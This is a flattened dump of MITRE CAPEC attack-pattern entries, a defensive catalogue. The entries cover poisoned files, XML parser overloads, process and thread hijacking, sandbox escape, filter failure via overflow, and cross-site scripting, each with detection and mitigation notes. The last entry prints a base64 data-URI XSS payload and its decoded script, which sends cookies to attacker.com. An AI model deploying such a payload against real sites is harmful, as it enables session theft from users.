CAPEC Content Team
The MITRE Corporation
2014-06-23
An attack of this type exploits the host's trust in executing remote content including binary files. The files are poisoned with a malicious payload (targeting the file systems accessible by the target software) by the attacker and may be passed through standard channels such as via email, and standard web content like PDF and multimedia files. The attacker exploits known vulnerabilities or handling routines in the target processes. Vulnerabilities of this type have been found in a wide variety of commercial applications from Microsoft Office to Adobe Acrobat and Apple Safari web browser. When the attacker knows the standard handling routines and can identify vulnerabilities and entry points they can be exploited by otherwise seemingly normal content. Once the attack is executed, the attackers' program can access relative directories such as C:\Program Files or other standard system directories to launch further attacks. In a worst case scenario, these programs are combined with other propagation logic and work as a virus.
The target software must consume files.
The attacker must have access to modify files that the target software will consume.
Very High
High
Injection
API Abuse
PHP is a very popular language used for developing web applications. When PHP is used with global variables, a vulnerability may be opened that affects the file system. A standard HTML form that allows for remote users to upload files, may also place those files in a public directory where the attacker can directly access and execute them through a browser. This vulnerability allows remote attackers to execute arbitrary code on the system, and can result in the attacker being able to erase intrusion evidence from system and application logs.
[R.23.2]
Medium
Design: Enforce principle of least privilege
Design: Validate all input for content including files. Ensure that if files and remote content must be accepted that once accepted, they are placed in a sandbox type location so that lower assurance clients cannot write up to higher assurance processes (like Web server processes for example)
Design: Execute programs with constrained privileges, so parent process does not open up further vulnerabilities. Ensure that all directories, temporary directories and files, and memory are executing with limited privileges to protect against remote execution.
Design: Proxy communication to host, so that communications are terminated at the proxy, sanitizing the requests before forwarding to server host.
Implementation: Virus scanning on host
Implementation: Host integrity monitoring for critical files, directories, and processes. The goal of host integrity monitoring is to be aware when a security issue has occurred so that incident response and other forensic activities can begin.
Confidentiality
Integrity
Availability
Execute unauthorized code or commands
Run Arbitrary Code
Payload delivered through standard communication protocols.
Command(s) executed directly on host filesystem
Client machine and client network
Enables attacker to execute server side code with any commands that the program owner has privileges to.
77
Targeted
23
Targeted
22
Targeted
713
Targeted
715
Targeted
1000
Attack Pattern
ChildOf
241
1000
Attack Pattern
ChildOf
242
1000
Attack Pattern
ChildOf
165
Exploitation
High
High
High
All
All
All
All
G. Hoglund
G. McGraw
Exploiting Software: How to Break Code
Addison-Wesley
February 2004
The OWASP Guide Project
File System
The Open Web Application Security Project (OWASP)
http://www.owasp.org/index.php/File_System
CAPEC Content Team
The MITRE Corporation
2014-06-23
Applications often need to transform data in and out of the XML format by using an XML parser. It may be possible for an attacker to inject data that may have an adverse effect on the XML parser when it is being processed. By nesting XML data and causing this data to be continuously self-referential, an attacker can cause the XML parser to consume more resources while processing, causing excessive memory consumption and CPU utilization. An attacker's goal is to leverage parser failure to his or her advantage. In most cases this type of an attack will result in a denial of service due to an application becoming unstable, freezing, or crash. However it may be possible to cause a crash resulting in arbitrary code execution, leading to a jump from the data plane to the control plane [R.230.1].
An attacker determines the input data stream that is being processed by an XML parser on the victim's side.
An attacker crafts input data that may have an adverse effect on the operation of the XML parser when the data is parsed on the victim's system.
An application uses an XML parser to perform transformation on user-controllable data.
An application does not perform sufficient validation to ensure that user-controllable data is safe for an XML parser.
High
Medium
Injection
API Abuse
Low
Denial of service
High
Arbitrary code execution
Bad data is passed to the XML parser, possibly making it crash.
Carefully validate and sanitize all user-controllable data prior to passing it to the XML parser routine. Ensure that the resultant data is safe to pass to the XML parser.
Perform validation on canonical data.
Pick a robust implementation of an XML parser.
Validate XML against a valid schema or DTD prior to parsing.
Availability
DoS: resource consumption (memory)
Confidentiality
Read memory
Confidentiality
Integrity
Availability
Execute unauthorized code or commands
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
Application XML-compliant interface
User-controllable XML code
The XML parser code.
112
Targeted
20
Targeted
19
Targeted
674
Targeted
770
Targeted
1000
Attack Pattern
ChildOf
130
Penetration
Exploitation
Medium
High
High
Client-Server
SOA
All
All
All
Shlomo, Yona
XML Parser Attacks: A summary of ways to attack an XML Parser
What is an XML Parser Attack?
2007
http://yeda.cs.technion.ac.il/~yona/talks/xml_parser_attacks/slides/slide2.html
CAPEC Content Team
The MITRE Corporation
2014-06-23
Applications often need to transform data in and out of the XML format by using an XML parser. It may be possible for an attacker to inject data that may have an adverse effect on the XML parser when it is being processed. By supplying oversized payloads in input vectors that will be processed by the XML parser, an attacker can cause the XML parser to consume more resources while processing, causing excessive memory consumption and CPU utilization, and potentially cause execution of arbitrary code. An attacker's goal is to leverage parser failure to his or her advantage. In many cases this type of an attack will result in a denial of service due to an application becoming unstable, freezing, or crash. However it is possible to cause a crash resulting in arbitrary code execution, leading to a jump from the data plane to the control plane [R.231.1].
An attacker determines the input data stream that is being processed by an XML parser on the victim's side.
An attacker crafts input data that may have an adverse effect on the operation of the XML parser when the data is parsed on the victim's system.
An application uses an XML parser to perform transformation on user-controllable data.
An application does not perform sufficient validation to ensure that user-controllable data is safe for an XML parser.
High
Medium
Injection
API Abuse
Low
Denial of service
High
Arbitrary code execution
Bad data is passed to the XML parser (possibly repeatedly), possibly making it crash or execute arbitrary code.
Carefully validate and sanitize all user-controllable data prior to passing it to the XML parser routine. Ensure that the resultant data is safe to pass to the XML parser.
Perform validation on canonical data.
Pick a robust implementation of an XML parser.
Validate XML against a valid schema or DTD prior to parsing.
Availability
DoS: resource consumption (memory)
Confidentiality
Read memory
Confidentiality
Integrity
Availability
Execute unauthorized code or commands
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
Application XML-compliant interface
User-controllable XML code
The XML parser code.
112
Targeted
20
Targeted
19
Targeted
674
Targeted
770
Targeted
1000
Attack Pattern
ChildOf
130
Penetration
Exploitation
Medium
High
High
Client-Server
SOA
All
All
All
Shlomo, Yona
XML Parser Attacks: A summary of ways to attack an XML Parser
What is an XML Parser Attack?
2007
http://yeda.cs.technion.ac.il/~yona/talks/xml_parser_attacks/slides/slide2.html
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker gains control of a process that is assigned elevated privileges in order to execute arbitrary code with those privileges. Some processes are assigned elevated privileges on an operating system, usually through association with a particular user, group, or role. If an attacker can hijack this process, they will be able to assume its level of privilege in order to execute their own code. Processes can be hijacked through improper handling of user input (for example, a buffer overflow or certain types of injection attacks) or by utilizing system utilities that support process control that have been inadequately secured.
The targeted process or operating system must contain a bug that allows attackers to hijack the targeted process.
Medium
No special resources are required.
732
Targeted
648
Secondary
CVE-2008-1363
VMware Workstation 6.0.x before 6.0.3 and 5.5.x before 5.5.6, VMware Player 2.0.x before 2.0.3 and 1.0.x before 1.0.6, VMware ACE 2.0.x before 2.0.1 and 1.0.x before 1.0.5, and VMware Server 1.0.x before 1.0.5 on Windows allow local users to gain privileges via an unspecified manipulation of a config.ini file located in an Application Data folder, which can be used for "hijacking the VMX process."
CVE-2007-6705
The WebSphere MQ XA 5.3 before FP13 and 6.0.x before 6.0.2.1 client for Windows, when running in an MTS or a COM+ environment, grants the PROCESS_DUP_HANDLE privilege to the Everyone group upon connection to a queue manager, which allows local users to duplicate an arbitrary handle and possibly hijack an arbitrary process.
1000
Category
ChildOf
232
CAPEC Content Team
The MITRE Corporation
2014-06-23
1000
Attack Pattern
ChildOf
30
1000
Attack Pattern
ChildOf
236
CAPEC Content Team
The MITRE Corporation
2014-06-23
Attackers can sometimes hijack a privileged thread from the underlying system through synchronous (calling a privileged function that returns incorrectly) or asynchronous (callbacks, signal handlers, and similar) means.
Having done so, the Attacker may not only likely access functionality the system's designer didn't intend for them, but they may also go undetected or deny other users essential service in a catastrophic (or insidiously subtle) way.
Attacker determines the underlying system thread that is subject to user-control
Attacker then provides input, perhaps by way of environment variables for the process in question, that affect the executing thread
Upon successful hijacking, the attacker enjoys elevated privileges, and can possibly have the hijacked thread do his bidding
The application in question employs a threaded model of execution with the threads operating at, or having the ability to switch to, a higher privilege level than normal users
In order to feasibly execute this class of attacks, the attacker must have the ability to hijack a privileged thread.
This ability includes, but is not limited to, modifying environment variables that affect the process the thread belongs to, or providing malformed user-controllable input that causes the executing thread to fault and return to a higher privilege level or such.
This does not preclude network-based attacks, but makes them conceptually more difficult to identify and execute.
Very High
Low
Analysis
Modification of Resources
API Abuse
Attacker targets an application written using Java's AWT, with the 1.2.2 era event model. In this circumstance, any AWTEvent originating in the underlying OS (such as a mouse click) would return a privileged thread. The Attacker could choose to not return the AWT-generated thread upon consuming the event, but instead leveraging its privilege to conduct privileged operations.
High
Hijacking a thread involves knowledge of how processes and threads function on the target platform, the design of the target application as well as the ability to identify the primitives to be used or manipulated to hijack the thread.
The attacker needs to be able to latch onto a privileged thread. No special hardware or software tool-based resources are required.
The Attacker does, however, need to be able to program, compile, and link to the victim binaries being executed so that it will turn control of a privileged thread over to the Attacker's malicious code. This is the case even if the attacker conducts the attack remotely.
The attacker may attach a debugger to the executing process and observe the spawning and cleanup of threads, as well as the switches in privilege levels.
The attacker can also observe the environment variables, if any, that affect executing threads and modify them in order to observe their effect on the execution.
Application Architects must be careful to design callback, signal, and similar asynchronous constructs such that they shed excess privilege prior to handing control to user-written (thus untrusted) code.
Application Architects must be careful to design privileged code blocks such that upon return (successful, failed, or unpredicted) that privilege is shed prior to leaving the block/scope.
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
Confidentiality
Integrity
Availability
Execute unauthorized code or commands
Run Arbitrary Code
270
Secondary
1000
Attack Pattern
ChildOf
30
1000
Category
ChildOf
232
Only those constructs within the application that cannot execute without elevated privileges must be granted additional privileges. Often times, the entire function or the entire process is granted privileges that are usually not necessary.
The callee must ensure that additional privileges are shed before returning to the caller. This avoids pinning the responsibility on an inadvertent caller who may not have a clue about the innards of the callee.
Least Privilege
Complete Mediation
Minimize privileged code blocks
Shed any privileges not required to execute at the earliest
Treat the Entire Inherited Process Context as Unvalidated Input
Exploitation
High
High
Low
All
All
All
All
CAPEC Content Team
The MITRE Corporation
2014-06-23
The attacker may submit a malicious signed code from another language to obtain access to privileges that were not intentionally exposed by the sandbox, thus escaping the sandbox. For instance, Java code cannot perform unsafe operations, such as modifying arbitrary memory locations, due to restrictions placed on it by the Byte code Verifier and the JVM. If allowed, Java code can call directly into native C code, which may perform unsafe operations, such as call system calls and modify arbitrary memory locations on their behave. To provide isolation, Java does not grant untrusted code with unmediated access to native C code. Instead, the sandboxed code is typically allowed to call some subset of the pre-existing native code that is part of standard libraries.
Probing
The attacker probes the target application to see whether calling signed code from another language is allowed within a sandbox.
The attacker probes the target application to see whether calling signed code from another language is allowed within a sandbox.
env-All
The target application allows calling signed code from another language within a sandbox.
env-All
The attacker knows that the target application is calling signed code from another language within a sandbox.
Analysis
The attacker analyzes the target application to get a list of cross code weaknesses in the standard libraries of the sandbox.
The attacker analyzes the target application to get a list of cross code weaknesses in the standard libraries of the sandbox.
env-All
The standard library of the sandbox has some cross code security weaknesses.
env-All
The attacker gets a list of cross code security weaknesses in the standard libraries.
Sanitize the code of the standard libraries to make sure there is no security weaknesses in them.
If possible, use obfuscation and other techniques to prevent reverse engineering the libraries.
Verify the exploitable security weaknesses
The attacker tries to craft malicious signed code from another language allowed by the sandbox to verify the security weaknesses of the standard libraries found in the Explore phase.
The attacker tries to explore the security weaknesses by calling malicious signed code from another language allowed by the sandbox.
env-Web
The attacker identifies a list exploitable security weaknesses in the standard libraries.
Sanitize the code of the standard libraries to make sure there are no security weaknesses in them.
Exploit the security weaknesses in the standard libraries
The attacker calls signed malicious code from another language to exploit the security weaknesses in the standard libraries verified in the Experiment phase. The attacker will be able to obtain access to privileges that were not intentionally exposed by the sandbox, thus escaping the sandbox.
The attacker calls signed malicious code from another language to exploit the security weaknesses in the standard libraries.
env-All
The attacker escapes the sandbox to obtain access to privileges that were not intentionally exposed by the sandbox.
Sanitize the code of the standard libraries to make sure there is no security weaknesses in them.
A framework-based language that supports code signing and sandbox (such as Java, .Net, JavaScript, and Flash) Deployed code that has been signed by its authoring vendor, or a partner
Very High
Low
Analysis
API Abuse
Exploit: Java/ByteVerify.C is a detection of malicious code that attempts to exploit a vulnerability in the Microsoft Virtual Machine (VM). The VM enables Java programs to run on Windows platforms. The Microsoft Java VM is included in most versions of Windows and Internet Explorer. In some versions of the Microsoft VM, a vulnerability exists because of a flaw in the way the ByteCode Verifier checks code when it is initially being loaded by the Microsoft VM. The ByteCode Verifier is a low level process in the Microsoft VM that is responsible for checking the validity of code - or byte code - as it is initially being loaded into the Microsoft VM. Exploit:Java/ByteVerify.C attempts to download a file named "msits.exe", located in the same virtual directory as the Java applet, into the Windows system folder, and with a random file name. It then tries to execute this specific file. This flaw enables attackers to execute arbitrary code on a user's machine such as writing, downloading and executing additional malware. This vulnerability is addressed by update MS03-011, released in 2003.
High
The attacker must have a good knowledge of the platform specific mechanisms of signing and verifying code. Most code signing and verification schemes are based on use of cryptography, the attacker needs to have an understand of these cryptographic operations in good detail.
No special resource is required.
Assurance: Sanitize the code of the standard libraries to make sure there is no security weaknesses in them.
Design: Use obfuscation and other techniques to prevent reverse engineering the standard libraries.
Assurance: Use static analysis tool to do code review and dynamic tool to do penetration test on the standard library.
Configuration: Get latest updates for the computer.
Access_Control
Authorization
Bypass protection mechanism
Authorization
Execute unauthorized code or commands
Run Arbitrary Code
Accountability
Authentication
Authorization
Non-Repudiation
Gain privileges / assume identity
693
Targeted
1000
Attack Pattern
ChildOf
68
http://capec.mitre.org/data/definitions/68.html
1000
Attack Pattern
ChildOf
115
Exploitation
High
High
High
All
All
All
Java
ASP.NET
C#
JSP
Other
J. Cappos
J. Rasley
J. Samuel
I. Beschastnikh
C. Barsan
A. Krishnamurthy
T. Anderson
Retaining Sandbox Containment Despite Bugs in Privileged Memory-Safe Code
The 17th ACM Conference on Computer and Communications Security (CCS '10)
2010
Malware Protection Center: Threat Research and Response
Exploit: Java/ByteVerify.C
Microsoft Corporation
2007
http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Exploit%3AJava%2FByteVerify.C
CAPEC Content Team
The MITRE Corporation
2014-06-23
1000
Attack Pattern
ChildOf
68
CAPEC Content Team
The MITRE Corporation
2014-06-23
1000
Attack Pattern
ChildOf
56
CAPEC Content Team
The MITRE Corporation
2014-06-23
In this attack, the idea is to cause an active filter to fail by causing an oversized transaction. An attacker may try to feed overly long input strings to the program in an attempt to overwhelm the filter (by causing a buffer overflow) and hoping that the filter does not fail securely (i.e. the user input is let into the system unfiltered).
Survey
The attacker surveys the target application, possibly as a valid and authenticated user
Spidering web sites for inputs that involve potential filtering
env-Web
Brute force guessing of filtered inputs
env-All
Software messages (e.g., "the following characters are not allowed...") indicate that filtered inputs are present in the software. (
env-Web env-ClientServer
Application uses predefined inputs (e.g., drop-down lists, radio buttons, selection lists, etc.)
env-Web env-ClientServer env-Local env-Embedded
Managed code (e.g., .NET, Java) is likely, based on URLs.
env-Web
Managed code (e.g., .NET, Java) is likely, based on files found in software.
env-ClientServer env-Local env-Embedded env-Peer2Peer env-CommProtocol
Java code is likely, based on standard disclaimers (e.g., "This software contains Java from Sun...."). Such declarations are frequent on commercial software that is based on Java.
env-Embedded env-Local env-ClientServer
Java code is likely, based on one of the other indicators, but it could contain Java Native Interface (JNI) code. This is indicated by the inclusion of DLLs or equivalent binary object code with Java code.
env-Embedded env-Local env-ClientServer
Attempt injections
Try to feed overly long data to the system. This can be done manually or a dynamic tool (black box) can be used to automate this. An attacker can also use a custom script for that purpose.
Brute force attack through black box penetration test tool.
env-Web env-ClientServer env-CommProtocol env-Peer2Peer
Fuzzing of communications protocols
env-CommProtocol env-Peer2Peer env-ClientServer
Manual testing of possible inputs with attack data.
env-All
Unexpected output from the application.
No unexpected output from the application.
Monitor and analyze logs for failures that exceed common usage sizes. For example, if typical transactions, even normal failed transactions, rarely exceed 250 characters, monitor logs for all attempts that contain 250 or more characters. In the event of successful exploitation, there may actually be no useful log. But an attacker's experiments will likely show up, giving clues to the ultimate attack.
Disconnect or block connections from systems or users that exceed acceptable heuristics for normal transaction sizes.
Monitor responses
Watch for any indication of failure occurring. Carefully watch to see what happened when filter failure occurred. Did the data get in?
Boron tagging. Choose clear attack inputs that are easy to notice in output. In binary this is often 0xa5a5a5a5 (alternating 1s and 0s). Another obvious tag value is all zeroes, but it is not always obvious what goes wrong if the null values get into the data.
env-All
Check Log files. An attacker with access to log files can look at the outcome of bad input.
env-Local env-Embedded
Prevent access to log files that contain error output.
Prevent access to and/or sanitize all error output.
Abuse the system through filter failure
An attacker writes a script to consistently induce the filter failure.
DoS through filter failure. The attacker causes the system to crash or stay down because of its failure to filter properly.
env-All
Malicious code execution. An attacker introduces a malicious payload and executes arbitrary code on the target system.
env-All
An attacker can use the filter failure to introduce malicious data into the system and leverage a subsequent SQL injection, Cross Site Scripting, Command Injection or similar weakness if it exists.
env-All
Failure mode of the software (perhaps as a safety mechanism) includes exiting or ceasing to respond.
env-All
Failures do not involve stopping services, rejecting inputs or connections, and do not affect other simultaneous users of the software.
env-All
Attacker-supplied code is executed on the target system.
The software stops responding for at least two orders of magnitude longer than the input takes to send. (e.g., 0.1s to send input induces at least a 10 second period non-responsiveness).
Non-response by an attacker's input has an impact on the quality of service of other simultaneous users of the software.
Monitor software response time regularly, and react to unexpected variations.
Execute filtering modules with minimal privileges.
Execute filtering modules in operating system "sandboxes" or similar containers.
Ability to control the length of data passed to an active filter.
High
High
Injection
Attack Example: Filter Failure in Taylor UUCP Daemon
Sending in arguments that are too long to cause the filter to fail open is one instantiation of the filter failure attack. The Taylor UUCP daemon is designed to remove hostile arguments before they can be executed. If the arguments are too long, however, the daemon fails to remove them. This leaves the door open for attack.
A filter is used by a web application to filter out characters that may allow the input to jump from the data plane to the control plane when data is used in a SQL statement (chaining this attack with the SQL injection attack). Leveraging a buffer overflow the attacker makes the filter fail insecurely and the tainted data is permitted to enter unfiltered into the system, subsequently causing a SQL injection.
Audit Truncation and Filters with Buffer Overflow. Sometimes very large transactions can be used to destroy a log file or cause partial logging failures. In this kind of attack, log processing code might be examining a transaction in real-time processing, but the oversized transaction causes a logic branch or an exception of some kind that is trapped. In other words, the transaction is still executed, but the logging or filtering mechanism still fails. This has two consequences, the first being that you can run transactions that are not logged in any way (or perhaps the log entry is completely corrupted). The second consequence is that you might slip through an active filter that otherwise would stop your attack.
Low
An attacker can simply overflow a buffer by inserting a long string into an attacker-modifiable injection vector. The result can be a DoS.
High
Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.
Try to feed very long data as input to the program and watch for any indication that a failure has occurred. Then see if input has been admitted into the system.
Some dynamic analysis tools may be helpful here to determine whether failure can be induced by feeding overly long inputs strings into the system.
Many exceptions are thrown by the application's filter modules in a short period of time. Check the logs. See if the probes are coming from the same IP address.
An attacker may temporally space out their probes.
An attacker may perform probes from different IP addresses.
Make sure that ANY failure occurring in the filtering or input validation routine is properly handled and that offending input is NOT allowed to go through. Basically make sure that the vault is closed when failure occurs.
Pre-design: Use a language or compiler that performs automatic bounds checking.
Pre-design through Build: Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. Unless this provides automatic bounds checking, it is not a complete solution.
Operational: Use OS-level preventative functionality. Not a complete solution.
Design: Use an abstraction library to abstract away risky APIs. Not a complete solution.
Integrity
Modify memory
Confidentiality
Integrity
Availability
Execute unauthorized code or commands
Run Arbitrary Code
Confidentiality
Access_Control
Authorization
Bypass protection mechanism
Availability
DoS: crash / exit / restart
Web form, URL, File, Command line, Network socket, etc.
All of the data that just got into the system unfiltered becomes the payload.
Since the input enters the system effectively unfiltered, it may be dangerous if used in a SQL statement (i.e. SQL injection), as part of the command executed on the target system (i.e. command injection), as part of the reflection API (i.e. reflection injection), placed in logs (i.e. log injection), or perhaps to overflow another buffer in the system and give the attacker ability to execute arbitrary code. A subsequent buffer overflow may not even be required for that as the original one may be leveraged if the attacker gets lucky, that is the payload is activated in the filter itself, which also becomes the activation zone.
Since no input validation is effectively performed in this situation, the impact of the attack may be a complete compromise of confidentiality, integrity, accountability and availability services.
120
Targeted
119
Targeted
118
Targeted
74
Targeted
20
Targeted
680
Targeted
733
Secondary
697
Targeted
1000
Attack Pattern
CanFollow
100
1000
Attack Pattern
ChildOf
100
Input validation and filtering logic should fail securely (vault doors are closed)
Failing Securely
All input should be treated as rejected by default, unless explicitly allowed by the filter. Thus if the filter fails before "blessing" the data, it will be rejected.
Penetration
Medium
High
Medium
All
All
All
All
C
C++
G. Hoglund
G. McGraw
Exploiting Software: How to Break Code
Addison-Wesley
February 2004
Common Weakness Enumeration (CWE)
CWE-119: Buffer Errors
Draft
The MITRE Corporation
2007
http://cwe.mitre.org/data/definitions/119.html
CAPEC Content Team
The MITRE Corporation
2014-06-23
CAPEC Content Team
The MITRE Corporation
2014-06-23
1000
Attack Pattern
ChildOf
240
CAPEC Content Team
The MITRE Corporation
2014-06-23
An adversary exploits a weakness in input validation on the target to inject new code into that which is currently executing. This differs from code inclusion in that code inclusion involves the addition or replacement of a reference to a code file, which is subsequently loaded by the target and used as part of the code of some application.
CAPEC Content Team
The MITRE Corporation
2014-06-23
The attacker inserts commands to perform cross-site scripting (XSS) actions in HTML attributes. Many filters do not adequately sanitize attributes against the presence of potentially dangerous commands even if they adequately sanitize tags. For example, dangerous expressions could be inserted into a style attribute in an anchor tag, resulting in the execution of malicious code when the resulting page is rendered. If a victim is tricked into viewing the rendered page the attack proceeds like a normal XSS attack, possibly resulting in the loss of sensitive cookies or other malicious activities.
The target application must fail to adequately sanitize HTML attributes against the presence of dangerous commands.
Medium
The attacker must trick the victim into following a crafted link to a vulnerable server or view a web post where the dangerous commands are executed.
Design: Use libraries and templates that minimize unfiltered input.
Implementation: Normalize, filter and white list all input including that which is not expected to have any scripting content.
Implementation: The victim should configure the browser to minimize active content from untrusted sources.
79
Targeted
83
Targeted
1000
Attack Pattern
ChildOf
18
Jeremiah Grossman
Attribute-Based Cross-Site Scripting
http://jeremiahgrossman.blogspot.com/2007/07/attribute-based-cross-site-scripting.html
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attack of this type exploits the ability of most browsers to interpret "data", "javascript" or other URI schemes as client-side executable content placeholders. This attack consists of passing a malicious URI in an anchor tag HREF attribute or any other similar attributes in other HTML tags. Such malicious URI contains, for example, a base64 encoded HTML content with an embedded cross-site scripting payload. The attack is executed when the browser interprets the malicious content i.e., for example, when the victim clicks on the malicious link.
Survey the application
Using a browser or an automated tool, an attacker follows all public links on a web site. He records all the links he finds.
Use a spidering tool to follow and record all links. Make special note of any links that include parameters in the URL.
env-Web
Use a proxy tool to record all links visited during a manual traversal of the web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.
env-Web
Use a browser to manually explore the website and analyze how it is constructed. Many browser's plugins are available to facilitate the analysis or automate the URL discovery.
env-Web
URL parameters are used by the application or the browser (DOM) in a context that is originally used for storing URL (anchor's "href", script's "src", etc.)
env-Web
Using URL rewriting, parameters may be part of the URL path.
env-Web
No parameters appear on the URL. Even though none appear, the web application may still use them if they are provided.
env-Web
Applications that have only static pages or that simply present information without accepting input are unlikely to be susceptible.
env-Web
Attempt injection payload variations on input parameters
Possibly using an automated tool, an attacker requests variations on the inputs he surveyed before. He sends parameters that include variations of payloads. He records all the responses from the server that include unmodified versions of his script.
Use a list of XSS probe strings using different URI schemes to inject in parameters of known URLs. If possible, the probe strings contain a unique identifier to trace the injected string back to the entry point.
env-Web
Use a proxy tool to record results of manual input of XSS probes in known URLs.
env-Web
Input parameters are printed back in a URL placeholder that support different URI schemes such as HREF, SRC, and other attributes
env-Web
Nothing is returned to the web page. The payload may be a stored to be served later. The unique identifier from the probe helps to trace the flow of the possible XSS
env-Web
The attacker's cross-site scripting string is included in the URI scheme content and can be triggered by a user (a victim in this case).
Custom URI scheme aren't allowed by the application
Some sensitive characters are consistently encoded, but others are not
Monitor input to web servers, application servers, and other HTTP infrastructure (e.g., load balancers). Alert on standard XSS probes. The majority of attackers use well-known strings to check for vulnerabilities. Use the same vulnerability catalogs that adversaries use.
Apply appropriate input validation to filter all user-controllable input of scripting syntax
Do not embed user-controllable input generated HTTP headers
Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes.
Steal session IDs, credentials, page content, etc.
As the attacker succeeds in exploiting the vulnerability, he can choose to steal user's credentials in order to reuse or to analyze them later on.
Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and sends document information to the attacker.
env-Web
Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker's server and then causes the browser to execute appropriately.
env-Web
The attacker gets the user's cookies or other session identifiers.
The attacker gets the content of the page the user is viewing.
The attacker causes the user's browser to visit a page with malicious content.
Monitor server logs for scripting parameters.
Monitor server logs for referrers. If users are being tricked into clicking XSS links through forums or other web postings, their web browsers will be providing Referrer headers most of the time. These can help indicate that the actual request is illegitimate.
Apply appropriate input validation to filter all user-controllable input of scripting syntax
Appropriately encode all browser output to avoid scripting syntax
Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes.
Forceful browsing
When the attacker targets the current application or another one (through CSRF vulnerabilities), the user will then be the one who perform the attacks without being aware of it. These attacks are mostly targeting application logic flaws, but it can also be used to create a widespread attack against a particular website on the user's current network (Internet or not).
Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and performs actions on the same web site
env-Web
Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker's server and then causes the browser to execute request to other web sites (especially the web applications that have CSRF vulnerabilities).
env-Web
The attacker indirectly controls the user's browser and makes it performing actions exploiting CSRF.
The attacker manipulates the browser through the steps that he designed in his attack. The user, identified on a website, is now performing actions he is not aware of.
Monitor server logs for scripting parameters.
Monitor server logs for referrers. If users are being tricked into clicking XSS links through forums or other web postings, their web browsers will be providing Referrer headers most of the time. These can help indicate that the actual request is illegitimate.
Apply appropriate input validation to filter all user-controllable input of scripting syntax
Appropriately encode all browser output to avoid scripting syntax
Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes.
Content spoofing
By manipulating the content, the attacker targets the information that the user would like to get from the website
Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and exposes attacker-modified invalid information to the user on the current web page.
env-Web
The user sees a page containing wrong information
Monitor server logs for scripting parameters.
Monitor server logs for referrers. If users are being tricked into clicking XSS links through forums or other web postings, their web browsers will be providing Referrer headers most of the time. These can help indicate that the actual request is illegitimate.
Apply appropriate input validation to filter all user-controllable input of scripting syntax
Appropriately encode all browser output to avoid scripting syntax
Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes.
Target client software must allow scripting such as JavaScript and allows executable content delivered using a data URI scheme.
High
High
Injection
Protocol Manipulation
The following payload data:
text/html;base64,PGh0bWw+PGJvZHk+PHNjcmlwdD52YXIgaW1nID0gbmV3IEltYWdlKCk7IGltZy5zcmMgPSAiaHR0cDovL2F0dGFja2VyLmNvbS9jb29raWVncmFiYmVyPyIrIGVuY29kZVVSSUNvbXBvbmVudChkb2N1bWVudC5jb29raWVzKTs8L3NjcmlwdD48L2JvZHk+PC9odG1sPg==
represents a base64 encoded HTML and uses the data URI scheme to deliver it to the browser.
The decoded payload is the following piece of HTML code:
<html>
<body>
<script>
var img = new Image();
img.src = "http://attacker.com/cookiegrabber?"+ encodeURIComponent(document.cookies);
</script>
</body>
</html>
Web applications that take user controlled inputs and reflect them in URI HTML placeholder without a proper validation are at risk for such an attack.
An attacker could inject the previous payload that would be placed in a URI placeholder (for example in the anchor tag HREF attribute):
<a href="INJECTION_POINT">My Link</a>
Once the victim clicks on the link, the browser will decode and execute the content from the payload. This will result on the execution of the cross-site scripting attack.
Medium
To inject the malicious payload in a web page
Ability to send HTTP request to a web application
Design: Use browser technologies that do not allow client side scripting.
Design: Utilize strict type, character, and encoding enforcement.
Implementation: Ensure all content that is delivered to client is sanitized against an acceptable content specification.
Implementation: Ensure all content coming from the client is using the same encoding; if not, the server-side application must canonicalize the data before applying any filtering.
Implementation: Perform input validation for all remote content, including remote and user-generated content
Implementation: Perform output validation for all remote content.
Implementation: Disable scripting languages such as JavaScript in browser
Implementation: Patching software. There are many attack vectors for XSS on the client side and the server side. Many vulnerabilities are fixed in service packs for browser, web servers, and plug in technologies, staying current on patch release that deal with XSS countermeasures mitigates this.
Integrity
Modify files or directories
Confidentiality
Read files or directories
Integrity
Modify application data
Confidentiality
Read application data
Authorization
Execute unauthorized code or commands
Run Arbitrary Code
Accountability
Authentication
Authorization
Non-Repudiation
Gain privileges / assume identity
Access_Control
Authorization
Bypass protection mechanism
Any HTTP Request transport variables (GET, POST, Headers, etc.)
XSS malicious script leveraging URI schemes
Client web browser where script is executed
Client web browser may be used to steal session data, passwords, cookies, and other tokens.
79
Targeted
84
Targeted
85
Targeted
20
Targeted
86
Targeted
692
Targeted
697
Targeted
713
Targeted
71
Targeted
1000
Attack Pattern
ChildOf
18
http://capec.mitre.org/data/definitions/18.html
1000
Attack Pattern
ChildOf
220
http://capec.mitre.org/data/definitions/220.html
Exploitation
High
High
Low
Client-Server
n-Tier
All
All
All
OWASP Testing Guide
Testing for Cross site scripting
v2
The Open Web Application Security Project (OWASP)
http://www.owasp.org/index.php/Testing_for_Cross_site_scripting
Google Cross-Site Scripting HOWTO article
Google
http://code.google.com/p/doctype/wiki/ArticleXSSInUrlAttributes
OWASP Cheatsheets
XSS Filter Evasion Cheat Sheet
The Open Web Application Security Project (OWASP)
http://ha.ckers.org/xss.html
WASC Threat Classification 2.0
WASC-08 - Cross Site Scripting
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/Cross-Site+Scripting
CAPEC Content Team
The MITRE Corporation
2014-06-23
